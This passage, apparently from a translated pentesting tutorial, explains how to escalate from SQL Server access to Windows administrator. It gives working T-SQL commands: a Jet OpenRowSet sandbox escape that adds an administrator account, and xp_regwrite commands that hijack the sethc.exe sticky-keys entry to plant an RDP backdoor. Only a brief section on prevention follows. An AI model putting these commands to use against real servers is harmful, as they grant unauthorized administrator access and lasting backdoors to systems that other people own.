exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\sethc.exe';
These two statements use the sp_oacreate stored procedure, which needs the odsole70.dll file, so whether that file survives determines whether the object can be created.
(2) xpsql.cpp: Error 5 from CreateProcess (line 737). This situation is trickier. The method given on the Internet is:
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user 123 123 /add")');
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 123 /add")');
I looked into this sandbox escalation, but in my practice the success rate is very low, because most servers have deleted c:\windows\system32\ias\ias.mdb.
Then you can try image hijacking of sethc. Of course image hijacking also has conditions: 1. the xp_regwrite stored procedure must exist; 2. the key 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe', 'Debugger' must not have been deleted. You can first query whether the registry sticky key has been hijacked:
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
If the prompt says it was not found, the key has been deleted and there is no way. If it returns sethc.exe, execute the SQL command:
EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe', @value_name='Debugger', @type='REG_SZ', @value='C:\WINDOWS\explorer.exe'
After connecting to the terminal and pressing Shift five times, it goes straight to the desktop, and then you add the user manually.
Registry keys that hold the terminal port:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
Prevention of image hijacking is mainly achieved through the following methods:
★ Permission restriction method
If the user no longer has access to the registry key, it cannot modify these things. Open the Registry Editor and go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options, select this key, right-click -> Permissions -> Advanced, and lower the permissions of the administrator and system users (here you just need to remove the write permission).
★ Cut-the-knot method
Open the Registry Editor and go to the key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
The problem can be solved by directly deleting the Image File Execution Options key.
SQL command that hijacks the registry sticky key to install a backdoor:
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe', 'Debugger','REG_SZ','C:\WINDOWS\system32\kdsn.exe'